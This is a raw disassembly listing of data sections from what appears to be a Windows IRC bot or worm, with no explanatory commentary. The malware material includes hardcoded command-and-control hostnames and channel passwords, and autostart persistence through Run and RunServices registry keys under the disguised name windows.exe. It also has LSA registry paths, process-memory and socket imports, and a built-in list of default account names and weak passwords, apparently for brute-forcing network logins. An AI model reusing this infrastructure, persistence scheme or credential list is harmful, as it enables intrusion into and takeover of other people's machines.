db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_443A8C�o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+123�o
; ___security_error_handler+132�o
align 4
; char asc_43A198[]
asc_43A198 db 0Ah ; DATA XREF: __NMSG_WRITE+107�o
; ___security_error_handler+FC�o
db 0Ah,0
align 4
; char aRuntimeErrorPr[]
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+F5�o
db 0Ah
db 'Program: ',0
align 4
; char a___[]
a___ db '...',0 ; DATA XREF: __NMSG_WRITE+C1�o
; ___security_error_handler+CC�o
; char aProgramNameUnk[]
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: __NMSG_WRITE+8E�o
; ___security_error_handler+8B�o
align 8
stru_43A1D8 _msEH <0FFFFFFFFh, offset loc_426E79, offset loc_426E7D>
; DATA XREF: ___crtGetStringTypeA+2�o
; char aProgram[]
aProgram db 'Program: ',0 ; DATA XREF: ___security_error_handler+108�o
align 10h
aABufferOverrun db 'A buffer overrun has been detected which has corrupted the progra'
; DATA XREF: ___security_error_handler+62�o
db 'm',27h,'s',0Ah
db 'internal state. The program cannot safely continue execution and'
db ' must',0Ah
db 'now be terminated.',0Ah,0
aBufferOverrunD db 'Buffer overrun detected!',0
; DATA XREF: ___security_error_handler:loc_42701D�o
align 10h
aASecurityError db 'A security error of unknown cause has been detected which has',0Ah
; DATA XREF: ___security_error_handler+4C�o
db 'corrupted the program',27h,'s internal state. The program cannot sa'
db 'fely',0Ah
db 'continue execution and must now be terminated.',0Ah,0
align 4
; char aUnknownSecurit[]
aUnknownSecurit db 'Unknown security failure detected!',0
; DATA XREF: ___security_error_handler+47�o
align 4
stru_43A388 _msEH <0FFFFFFFFh, offset loc_426FF8, offset loc_426FFC>
; DATA XREF: ___security_error_handler+5�o
a_nextafter db '_nextafter',0
align 10h
a_logb db '_logb',0
align 4
a_yn db '_yn',0
a_y1 db '_y1',0
a_y0 db '_y0',0
aFrexp db 'frexp',0
align 4
aFmod db 'fmod',0
align 4
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 4
aLdexp db 'ldexp',0
align 4
aFabs db 'fabs',0
align 4
aTan db 'tan',0
aCos db 'cos',0
aSin db 'sin',0
aSqrt db 'sqrt',0
align 4
aAtan2 db 'atan2',0
align 10h
aAcos db 'acos',0
align 4
aAsin db 'asin',0
align 10h
aTanh db 'tanh',0
align 4
aCosh db 'cosh',0
align 10h
aSinh db 'sinh',0
align 4
stru_43A428 _msEH <0FFFFFFFFh, offset loc_4283F0, offset loc_4283F4>
; DATA XREF: ___convertcp+2�o
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: ___crtMessageBoxA+73�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: ___crtMessageBoxA+62�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+47�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: ___crtMessageBoxA+3F�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: ___crtMessageBoxA+2E�o
; char a1Qnan[]
a1Qnan db '1#QNAN',0 ; DATA XREF: _$I10_OUTPUT:loc_4290D4�o
align 10h
; char a1Inf[]
a1Inf db '1#INF',0 ; DATA XREF: _$I10_OUTPUT+CF�o
align 4
a1Ind db '1#IND',0 ; DATA XREF: _$I10_OUTPUT+BE�o
align 10h
a1Snan db '1#SNAN',0 ; DATA XREF: _$I10_OUTPUT+A4�o
align 4
dd offset dword_43A5F4
off_43A4BC dd offset sub_429779 ; DATA XREF: sub_429712+20�o
; sub_42975C+A�o ...
dd offset unknown_libname_8 ; Microsoft VisualC 2-8/net runtime
dd offset dword_43A640
off_43A4C8 dd offset sub_429795 ; DATA XREF: sub_4297B1�o
; sub_42987E+33�o ...
dd offset unknown_libname_8 ; Microsoft VisualC 2-8/net runtime
dd offset dword_43A68C
off_43A4D4 dd offset sub_4297BC ; DATA XREF: sub_4297D8�o
; sub_4297E3+33�o ...
dd offset unknown_libname_8 ; Microsoft VisualC 2-8/net runtime
; char aInvalidStringP[]
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_4297E3+D�o
; char aStringTooLong[]
aStringTooLong db 'string too long',0 ; DATA XREF: sub_42987E+D�o
dd offset dword_43A6D0
off_43A508 dd offset ??_Gtype_info@@UAEPAXI@Z ; DATA XREF: type_info::~type_info(void)�o
; .data:off_443FC4�o ...
; type_info::`scalar deleting destructor'(uint)
dd offset dword_43A6FC
off_43A510 dd offset sub_429A44 ; DATA XREF: sub_4299C6+A�o
; exception::exception(exception const &)+8�o ...
dd offset unknown_libname_9 ; Microsoft VisualC 2-8/net runtime
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: unknown_libname_9+7�o
align 10h
stru_43A530 _msEH <0FFFFFFFFh, offset loc_429C94, offset loc_429C98>
; DATA XREF: ___crtLCMapStringW+2�o
dd 0FFFFFFFFh, 429D21h, 429D25h
stru_43A548 _msEH <0FFFFFFFFh, offset loc_429F28, offset loc_429F2C>
; DATA XREF: ___crtGetStringTypeW+2�o
dd 0FFFFFFFFh, 429F9Ah, 429F9Eh, 48h, 0Eh dup(0)
dd offset dword_4437D4
dd offset dword_43A710
dword_43A5A4 dd 0Ah, 443FC4h, 2 dup(0) ; DATA XREF: .rdata:0043A5DC�o
; .rdata:0043A628�o ...
dd 0FFFFFFFFh, 2 dup(0)
off_43A5C0 dd offset off_443FDC ; DATA XREF: .rdata:0043A5D8�o
; .rdata:0043A624�o ...
dd 1, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_43A5C0
dd offset dword_43A5A4+4
dword_43A5E0 dd 3 dup(0) ; DATA XREF: .rdata:0043A604�o
dd 2, 43A5D8h
dword_43A5F4 dd 3 dup(0) ; DATA XREF: .rdata:0043A4B8�o
dd offset off_443FDC
dd offset dword_43A5E0+4
off_43A608 dd offset off_443FFC ; DATA XREF: .rdata:0043A620�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_43A608
dd offset off_43A5C0
dd offset dword_43A5A4+4
dword_43A62C dd 3 dup(0) ; DATA XREF: .rdata:0043A650�o
dd 3, 43A620h
dword_43A640 dd 3 dup(0) ; DATA XREF: .rdata:0043A4C4�o
dd offset off_443FFC
dd offset dword_43A62C+4
off_43A654 dd offset off_44401C ; DATA XREF: .rdata:0043A66C�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_43A654
dd offset off_43A5C0
dd offset dword_43A5A4+4
dword_43A678 dd 3 dup(0) ; DATA XREF: .rdata:0043A69C�o
dd 3, 43A66Ch
dword_43A68C dd 3 dup(0) ; DATA XREF: .rdata:0043A4D0�o
dd offset off_44401C
dd offset dword_43A678+4
off_43A6A0 dd offset off_44403C ; DATA XREF: .rdata:0043A6B8�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_43A6A0
dword_43A6BC dd 3 dup(0) ; DATA XREF: .rdata:0043A6E0�o
dd 1, 43A6B8h
dword_43A6D0 dd 3 dup(0) ; DATA XREF: .rdata:0043A504�o
dd offset off_44403C
dd offset dword_43A6BC+4
dd offset dword_43A5A4+4
dword_43A6E8 dd 3 dup(0) ; DATA XREF: .rdata:0043A70C�o
dd 1, 43A6E4h
dword_43A6FC dd 3 dup(0) ; DATA XREF: .rdata:0043A50C�o
dd offset off_443FC4
dd offset dword_43A6E8+4
dword_43A710 dd 1FF7Fh, 2007Fh, 20294h, 25F68h, 2A056h, 2A068h, 2A082h
; DATA XREF: .rdata:0043A5A0�o
dd 2A09Ah, 2A0ACh, 2A0BEh, 0
dword_43A73C dd 2 dup(0) ; DATA XREF: sub_423257+C�o
; sub_423257:loc_42326A�o
dword_43A744 dd 0 ; DATA XREF: sub_42329B+C�o
; sub_42329B:loc_4232AE�o
stru_43A748 _msExcInfo 2 dup(<-1, 0>) ; DATA XREF: .rdata:stru_43A7B0�o
_msExcInfo 2 dup(<1, 0>)
stru_43A768 _msRttiDscr <0, 0, 0, offset sub_40F0F7> ; DATA XREF: .rdata:stru_43A788�o
stru_43A778 _msRttiDscr <0, 0, 0, offset loc_40F083> ; DATA XREF: .rdata:stru_43A788�o
stru_43A788 dd 2, 2, 3 ; _unk ; DATA XREF: .rdata:stru_43A7B0�o
dd 1 ; Count
dd offset stru_43A768 ; RttiBlkPtr
dd 0, 0, 3 ; _unk
dd 1 ; Count
dd offset stru_43A778 ; RttiBlkPtr
stru_43A7B0 _msExcept7 <19930520h, 4, offset stru_43A748, 2, offset stru_43A788, 0>
; DATA XREF: unknown_libname_10�o
stru_43A7CC _msExcInfo <-1, offset sub_42A060> ; DATA XREF: .rdata:stru_43A7D4�o
stru_43A7D4 _msExcept7 <19930520h, 1, offset stru_43A7CC, 0, 0, 0>
; DATA XREF: .text:loc_42A068�o
stru_43A7F0 _msExcInfo <-1, offset sub_42A072> ; DATA XREF: .rdata:stru_43A800�o
_msExcInfo <0, offset sub_42A07A>
stru_43A800 _msExcept7 <19930520h, 2, offset stru_43A7F0, 0, 0, 0>
; DATA XREF: sub_42A082�o
stru_43A81C _msExcInfo <-1, offset sub_42A08C> ; DATA XREF: .rdata:stru_43A824�o
stru_43A824 _msExcept7 <19930520h, 1, offset stru_43A81C, 0, 0, 0>
; DATA XREF: .text:loc_42A09A�o
dd 0FFFFFFFFh, 42A0A4h, 19930520h, 1, 43A840h, 5 dup(0)
dd offset off_443FC4
align 10h
dd 0FFFFFFFFh, 0
dd 0Ch, 4299D7h, 0
dd offset off_443FDC
dd 0
dd 0FFFFFFFFh, 0
dd 28h, 429823h, 0
dd offset off_44401C
align 8
dd 0FFFFFFFFh, 0
dword_43A8B0 dd 28h, 429866h, 3, 43A89Ch, 43A880h, 43A864h ; DATA XREF: .rdata:0043A8D4�o
dword_43A8C8 dd 0 ; DATA XREF: sub_4297E3+2A�o
dd offset sub_4297D8
dd 0
dd offset dword_43A8B0+8
dd 0FFFFFFFFh, 42A0B6h, 19930520h, 1, 43A8D8h, 4 dup(0)
stru_43A8FC _msExcInfo <-1, offset sub_42A0A4> ; DATA XREF: .rdata:stru_43A904�o
stru_43A904 _msExcept7 <19930520h, 1, offset stru_43A8FC, 0, 0, 0>
; DATA XREF: .text:loc_42A0AC�o
dd 0
dd offset off_443FFC
dd 0
dd 0FFFFFFFFh, 0
dword_43A934 dd 28h, 4298BEh, 3, 43A920h, 43A880h, 43A864h ; DATA XREF: .rdata:0043A958�o
dword_43A94C dd 0 ; DATA XREF: sub_42987E+2A�o
dd offset sub_4297B1
align 8
dd offset dword_43A934+8
stru_43A95C _msExcInfo <-1, offset sub_42A0B6> ; DATA XREF: .rdata:stru_43A964�o
stru_43A964 _msExcept7 <19930520h, 1, offset stru_43A95C, 0, 0, 0>
; DATA XREF: .text:loc_42A0BE�o
dd 3A9BCh, 2 dup(0)
dd 3B188h, 2B000h, 3AB8Ch, 2 dup(0)
dd 3B1A4h, 2B1D0h, 5 dup(0)
dd 3ABE4h, 3ABF2h, 3AC00h, 3AC12h, 3AC28h, 3AC3Eh, 3AC46h
dd 3AC56h, 3AC66h, 3AC78h, 3AC8Ch, 3AC9Eh, 3ACACh, 3ACBCh
dd 3ACC8h, 3ACD8h, 3ACE8h, 3ACF6h, 3AD0Ch, 3AD18h, 3AD2Eh
dd 3AD44h, 3AD5Ah, 3AD6Ah, 3AD7Eh, 3AD90h, 3ADA0h, 3ADAEh
dd 3ADC6h, 3ADDEh, 3AE06h, 3AE1Eh, 3AE34h, 3AE40h, 3AE4Ch
dd 3AE60h, 3AE6Eh, 3AE84h, 3AE98h, 3AEAAh, 3AEBEh, 3AECCh
dd 3AED8h, 3AEF0h, 3AF0Ah, 3AF1Ah, 3AF2Ch, 3AF3Eh, 3AF4Ch
dd 3AF5Eh, 3AF70h, 3AF88h, 3AFA4h, 3AFBEh, 3AFCEh, 3AFE8h
dd 3B004h, 3B010h, 3B01Ch, 3B02Eh, 3B040h, 3B054h, 3B064h
dd 3B072h, 3B08Ch, 3B09Eh, 3B0AEh, 3B0BCh, 3B0CEh, 3B0DEh
dd 3B0F4h, 3B102h, 3B110h, 3B12Ch, 3B138h, 3B14Eh, 3B15Eh
dd 3B172h, 3B422h, 3B412h, 3B402h, 3B3F6h, 3B3E0h, 3B3CEh
dd 3B3BCh, 3B3A8h, 3B398h, 3B37Eh, 3B364h, 3B34Ch, 3B332h
dd 3B316h, 3B306h, 3B2F6h, 3B2E6h, 3B2D4h, 3B2B6h, 3B2A8h
dd 3B298h, 3B286h, 3B27Ah, 3B1B0h, 3B1BEh, 3B1D8h, 3B1E4h
dd 3B1F6h, 3B208h, 3B21Ah, 3B228h, 3B236h, 3B244h, 3B254h
dd 3B264h, 3B26Eh, 3B438h, 0
dd 3B196h, 80000007h, 8000000Fh, 8000000Ch, 80000015h
dd 8000000Ah, 80000002h, 8000000Dh, 80000001h, 80000004h
dd 80000003h, 80000074h, 80000009h, 80000073h, 80000010h
dd 80000017h, 80000013h, 80000097h, 8000000Bh, 80000012h
dd 80000006h, 0
dd 784500AFh, 72507469h, 7365636Fh, 2E0073h, 736F6C43h
dd 6E614865h, 656C64h, 72430060h, 65746165h, 636F7250h
dd 41737365h, 1750000h
aGetmodulefilen db 'GetModuleFileNameA',0
align 4
db 0B9h ; ¹
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
dw 347h
aSleep db 'Sleep',0
dw 248h
aLoadlibrarya db 'LoadLibraryA',0
align 2
dw 169h
aGetlasterror db 'GetLastError',0
align 2
dw 198h
aGetprocaddress db 'GetProcAddress',0
align 4
dd 65470177h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 65540350h
dd 6E696D72h, 54657461h, 61657268h, 7C0064h, 656C6544h
dd 69466574h, 41656Ch, 654701CBh, 6D655474h, 74615070h
dd 4168h, 6F4D0264h, 69466576h, 41656Ch, 654701D5h, 63695474h
dd 756F436Bh, 746Eh, 72430069h, 65746165h, 65726854h, 6461h
dd 704F027Ah, 72506E65h, 7365636Fh, 13B0073h
aGetcurrentproc db 'GetCurrentProcessId',0
db '=',0
aCopyfilea db 'CopyFileA',0
db 0Ch
db 3, 53h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 156h
aGetfileattribu db 'GetFileAttributesA',0
align 4
db 83h ; ƒ
db 3, 57h, 61h
aItforsingleobj db 'itForSingleObject',0
aZ_1 db 'Z',0
aCreatemutexa db 'CreateMutexA',0
align 2
dw 10Ch
aGetcomputernam db 'GetComputerNameA',0
align 2
dw 16Ch
aGetlocaleinfoa db 'GetLocaleInfoA',0
align 10h
dd 654701DFh, 72655674h, 6E6F6973h, 417845h, 784500B0h
dd 68547469h, 64616572h, 2470000h
aLeavecriticals db 'LeaveCriticalSection',0
align 2
aP_1 db '',0
aEntercriticals db 'EnterCriticalSection',0
align 2
dw 21Ah
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0
aZ_2 db 'z',0
aDeletecritical db 'DeleteCriticalSection',0
dw 26Bh
aMultibytetowid db 'MultiByteToWideChar',0
db 0A9h ; ©
db 2, 52h, 65h
aAdfile db 'adFile',0
align 10h
db 94h ; ”
db 3, 57h, 72h
aItefile db 'iteFile',0
db 59h ; Y
db 3, 54h, 72h
aAnsactnamedpip db 'ansactNamedPipe',0
aM_2 db 'M',0
aCreatefilea db 'CreateFileA',0
dw 387h
aWidechartomult db 'WideCharToMultiByte',0
dd 6554034Fh, 6E696D72h, 50657461h, 65636F72h, 7373h, 7544008Ch
dd 63696C70h, 48657461h, 6C646E61h, 13A0065h
aGetcurrentpr_0 db 'GetCurrentProcess',0
a__2 db '_',0
aCreatepipe db 'CreatePipe',0
align 4
db 'Å',0
aFindclose db 'FindClose',0
db '¼',0
aFiletimetosyst db 'FileTimeToSystemTime',0
align 10h
db '»',0
aFiletimetoloca db 'FileTimeToLocalFileTime',0
db 'Ó',0
aFindnextfilea db 'FindNextFileA',0
db 'É',0
aFindfirstfilea db 'FindFirstFileA',0
align 4
db 0Eh
db 3, 53h, 65h
aTfilepointer db 'tFilePointer',0
align 2
dw 15Bh
aGetfilesize db 'GetFileSize',0
db 0D6h ; Ö
db 1, 47h, 65h
aTtimeformata db 'tTimeFormatA',0
align 2
dw 13Fh
aGetdateformata db 'GetDateFormatA',0
align 10h
db 0E1h ; á
db 2, 53h, 65h
aTconsolectrlha db 'tConsoleCtrlHandler',0
db 0F4h ; ô
align 2
aGenerateconsol db 'GenerateConsoleCtrlEvent',0
align 4
db 81h ;
db 3, 57h, 61h
aItformultipleo db 'itForMultipleObjects',0
align 2
dw 16Bh
aGetlocaltime db 'GetLocalTime',0
align 2
dw 297h
aQueryperform_1 db 'QueryPerformanceCounter',0
db 98h ; ˜
db 2, 51h, 75h
aEryperformance db 'eryPerformanceFrequency',0
db 0Ch
db 2, 48h, 65h
aApfree db 'apFree',0
align 10h
db 6
db 2, 48h, 65h
aApalloc db 'apAlloc',0
db 9Bh ; ›
db 1, 47h, 65h
aTprocessheap db 'tProcessHeap',0
align 2
dw 37Ch
aVirtualqueryex db 'VirtualQueryEx',0
align 10h
db 0ACh ; ¬
db 2, 52h, 65h
aAdprocessmemor db 'adProcessMemory',0
dd 654701BBh, 73795374h, 496D6574h, 6F666Eh, 724600EFh
dd 694C6565h, 72617262h, 1510079h
aGetenvironment db 'GetEnvironmentVariableW',0
db 'ê',0
aFormatmessagea db 'FormatMessageA',0
db 2 dup(0), 2
aGlobalunlock db 'GlobalUnlock',0
align 2
dw 1F9h
aGloballock db 'GlobalLock',0
align 4
dd 6E550363h, 5670616Dh, 4F776569h, 6C694666h, 25E0065h
dd 5670614Dh, 4F776569h, 6C694666h, 4E0065h
aCreatefilemapp db 'CreateFileMappingA',0
align 4
db 12h
db 3, 53h, 65h
aTfiletime db 'tFileTime',0
dw 15Dh
aGetfiletime db 'GetFileTime',0
db '²',0
aExpandenvironm db 'ExpandEnvironmentStringsA',0
db 0B3h ; ³
db 3, 6Ch, 73h
aTrcmpia db 'trcmpiA',0
db 52h ; R
db 1, 47h, 65h
aTexitcodeproce db 'tExitCodeProcess',0
align 2
dw 285h
aPeeknamedpipe db 'PeekNamedPipe',0
dw 170h
aGetlogicaldr_0 db 'GetLogicalDrives',0
align 2
dw 1FAh
aGlobalmemoryst db 'GlobalMemoryStatus',0
align 4
aKernel32_dll_0 db 'KERNEL32.dll',0
align 2
a@_0 db '@',0
aWsasocketa_0 db 'WSASocketA',0
align 4
aWs2_32_dll_0 db 'WS2_32.dll',0
align 10h
dd 65480210h, 65527061h, 6F6C6C41h, 1C00063h
aGetsystemtimea db 'GetSystemTimeAsFileTime',0
dd 745202CAh, 776E556Ch, 646E69h, 6152029Bh, 45657369h
dd 70656378h, 6E6F6974h, 1AF0000h, 53746547h, 74726174h
dd 6E497075h, 416F66h, 65470108h, 6D6F4374h, 646E616Dh
dd 656E694Ch, 20A0041h, 70616548h, 74736544h, 796F72h
dd 65480208h, 72437061h, 65746165h, 3760000h, 74726956h
dd 466C6175h, 656572h, 69560373h, 61757472h, 6C6C416Ch
dd 636Fh, 7349022Ch, 57646142h, 65746972h, 727450h, 654700F5h
dd 50434174h, 18B0000h, 4F746547h, 50434D45h, 0FC0000h
dd 43746547h, 666E4950h, 317006Fh, 48746553h, 6C646E61h
dd 756F4365h, 746Eh, 654701B1h, 64745374h, 646E6148h, 656Ch
dd 6547015Eh, 6C694674h, 70795465h, 33B0065h
aSetunhandledex db 'SetUnhandledExceptionFilter',0
dd 69560379h, 61757472h, 6F72506Ch, 74636574h, 37B0000h
dd 74726956h, 516C6175h, 79726575h, 23A0000h, 614D434Ch
dd 72745370h, 41676E69h, 23B0000h, 614D434Ch, 72745370h
dd 57676E69h, 3600000h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 2
aA_2 db 'í',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
db 4Dh ; M
db 1, 47h, 65h
aTenvironmentst db 'tEnvironmentStrings',0
aU_1 db 'î',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
dw 14Fh
aGetenvironme_0 db 'GetEnvironmentStringsW',0
align 4
db 2Ah ; *
db 3, 53h, 65h
aTstdhandle db 'tStdHandle',0
align 4
db 'å',0
aFlushfilebuffe db 'FlushFileBuffers',0
align 4
db 0B2h ; ²
db 1, 47h, 65h
aTstringtypea db 'tStringTypeA',0
align 2
dw 1B5h
aGetstringtypew db 'GetStringTypeW',0
align 10h
db 3Eh ; >
db 1, 47h, 65h
aTcurrentthread db 'tCurrentThreadId',0
align 2
dw 212h
aHeapsize db 'HeapSize',0
align 2
dw 229h
aIsbadreadptr db 'IsBadReadPtr',0
align 2
dw 226h
aIsbadcodeptr db 'IsBadCodePtr',0
align 2
dw 21Fh
aInterlockedexc db 'InterlockedExchange',0
dd 65530303h, 646E4574h, 6946664Fh, 656Ch
_rdata ends
; Section 3. (virtual address 0003C000)
; Virtual size : 000A7F34 ( 687924.)
; Section size in file : 000A7F34 ( 687924.)
; Offset to raw data for section: 0003C000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 43C000h
dword_43C000 dd 0 ; DATA XREF: __cinit+45�o
dd offset ___security_init_cookie
dd offset sub_42A0C8
dd offset sub_42A0DF
dword_43C010 dd 0 ; DATA XREF: __cinit+4C�o
dword_43C014 dd 0 ; DATA XREF: __cinit+12�o
dd offset ___initstdio
dd offset ___initmbctable
dd offset ___onexitinit
dd offset ___sse2_available_init
dd offset sub_4255AA
dword_43C02C dd 0 ; DATA XREF: __cinit+17�o
dword_43C030 dd 0 ; DATA XREF: _doexit:loc_41F217�o
dd offset ___endstdio
dword_43C038 dd 0 ; DATA XREF: _doexit+6C�o
dword_43C03C dd 0 ; DATA XREF: _doexit:loc_41F236�o
dd offset sub_4255BD
dword_43C044 dd 3 dup(0) ; DATA XREF: _doexit+8B�o
dword_43C050 dd 80000002h ; DATA XREF: sub_401000+24�r
off_43C054 dd offset aSoftwareMicr_0 ; DATA XREF: sub_401000+1E�r
; "Software\\Microsoft\\Windows\\CurrentVersi"...
dd 80000002h, 43C1A0h, 80000001h, 43C170h
dword_43C068 dd 0FEF3h ; DATA XREF: WinMain(x,x,x,x)+48B�r
; WinMain(x,x,x,x)+513�r
dword_43C06C dd 0FEF3h ; DATA XREF: WinMain(x,x,x,x)+559�r
dword_43C070 dd 1ECFh ; DATA XREF: sub_40274D:loc_405090�r
dword_43C074 dd 539h ; DATA XREF: sub_40274D+1E88�r
; sub_40B690+3B�r
dword_43C078 dd 24A8h ; DATA XREF: sub_40274D:loc_4046B9�r
; sub_40B690:loc_40BA78�r
dword_43C07C dd 2700h ; DATA XREF: sub_40274D:loc_404825�r
word_43C080 dw 116Ch ; DATA XREF: sub_40274D:loc_4051A9�r
align 4
dword_43C084 dd 1 ; DATA XREF: sub_40274D+5CE�r
dword_43C088 dd 1 ; DATA XREF: WinMain(x,x,x,x):loc_40A58E�r
; sub_41AEDD+C�r
byte_43C08C db 2Eh ; DATA XREF: sub_40274D+9A7�r
; sub_40274D+A5B�r ...
align 10h
dword_43C090 dd 4 ; DATA XREF: sub_40A800+39�r
; sub_40A800+5F�r ...
; int dword_43C094
dword_43C094 dd 4 ; DATA XREF: sub_4025EF+44�r
; sub_40274D+252�r ...
; int dword_43C098
dword_43C098 dd 1 ; DATA XREF: sub_4025EF+3B�r
; sub_40274D+24C�r
; char aFicken[]
aFicken db 'ficken',0 ; DATA XREF: sub_40274D:loc_404EF5�o
; sub_40274D+6677�o ...
align 4
aBloodRep db 'blood-rep',0 ; DATA XREF: sub_40274D:loc_40539F�o
align 10h
; char aKeke1[]
aKeke1 db 'keke1',0 ; DATA XREF: sub_40274D+79AC�o
; sub_40274D+7A63�o
align 4
; char aBxi_ath_cx[]
aBxi_ath_cx db 'bxi.ath.cx',0 ; DATA XREF: WinMain(x,x,x,x)+477�o
; WinMain(x,x,x,x)+504�o
align 4
; char a_fast_[]
a_fast_ db '#.fast.#',0 ; DATA XREF: WinMain(x,x,x,x)+492�o
; WinMain(x,x,x,x)+51A�o ...
align 10h
; char aRofl1[]
aRofl1 db 'rofl1',0 ; DATA XREF: WinMain(x,x,x,x)+4A9�o
; WinMain(x,x,x,x)+52C�o
align 4
; char byte_43C0D8
byte_43C0D8 db 62h ; DATA XREF: WinMain(x,x,x,x):loc_40A79F�r
; WinMain(x,x,x,x)+54A�o
aXi_ath_cx db 'xi.ath.cx',0
align 4
; char a_fast__0[]
a_fast__0 db '#.fast.#',0 ; DATA XREF: WinMain(x,x,x,x)+560�o
align 10h
; char aRofl1_0[]
aRofl1_0 db 'rofl1',0 ; DATA XREF: WinMain(x,x,x,x)+572�o
align 4
; char aWindows_exe[]
aWindows_exe db 'windows.exe',0 ; DATA XREF: sub_40274D+1E75�o
; WinMain(x,x,x,x)+13C�o ...
; char aWindows_sys[]
aWindows_sys db 'windows.sys',0 ; DATA XREF: sub_414B1C+3D�o
aLoghdriver db 'loghDriver',0 ; DATA XREF: sub_401000+B�o
align 4
aNetapi db 'netapi-',0 ; DATA XREF: .text:0040A87E�o
aTessst_exe db 'tessst.exe',0
align 10h
aXI db '-x+i',0 ; DATA XREF: sub_40274D+7AE0�o
align 4
; char a_fast__1[]
a_fast__1 db '#.fast.#',0 ; DATA XREF: sub_40274D+1B58�o
; sub_40274D+2E40�o ...
align 4
; char a_fast__3[]
a_fast__3 db '#.fast.#',0 ; DATA XREF: sub_40274D+41A7�o
align 10h
; char a_fast__2[]
a_fast__2 db '#.fast.#',0 ; DATA XREF: sub_40274D+3DDD�o
; sub_40274D+3F25�o
align 4
off_43C15C dd offset a@bxi_net ; DATA XREF: sub_40274D+7A09�r
; "*@bxi.net"
off_43C160 dd offset aMircV6_10Khale ; DATA XREF: sub_40274D+7EA�r
; "mIRC v6.10 Khaled Mardam-Bey"
dd offset aMircV6_12Khale ; "mIRC v6.12 Khaled Mardam-Bey"
dd offset aMircV6_14Khale ; "mIRC v6.14 Khaled Mardam-Bey"
dd offset aMircV6_16Khale ; "mIRC v6.16 Khaled Mardam-Bey"
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: .data:off_43C054�o
align 10h
aSoftwareMicr_2 db 'Software\Microsoft\Windows\CurrentVersion\RunServices',0
align 4
aSoftwareMicros db 'Software\Microsoft\OLE',0 ; DATA XREF: sub_41CB8D+23�o
; sub_41CEAF+23�o
align 10h
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Lsa',0 ; DATA XREF: sub_41CB8D+D0�o
; sub_41CEAF+D0�o
align 4
off_43C218 dd offset aAdministrato_0 ; DATA XREF: sub_4100AE+182�r
; sub_4100AE+18A�o
; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin_0 ; "admin"
dd offset aStaff ; "staff"
dd offset aRoot ; "root"
dd offset aComputer ; "computer"
dd offset aOwner ; "owner"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aWwwadmin ; "wwwadmin"
dd offset aGuest_0 ; "guest"
dd offset aDefault ; "default"
dd offset aDatabase ; "database"
dd offset aDba ; "dba"
dd offset aOracle ; "oracle"
dd offset aDb2 ; "db2"
align 8
off_43C268 dd offset byte_42B633 ; DATA XREF: sub_410047�r sub_410047+C�o
dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin_0 ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass_2 ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest_0 ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem ; "system"
dd offset aServer_1 ; "server"
dd offset aRoot ; "root"
dd offset aNull_1 ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
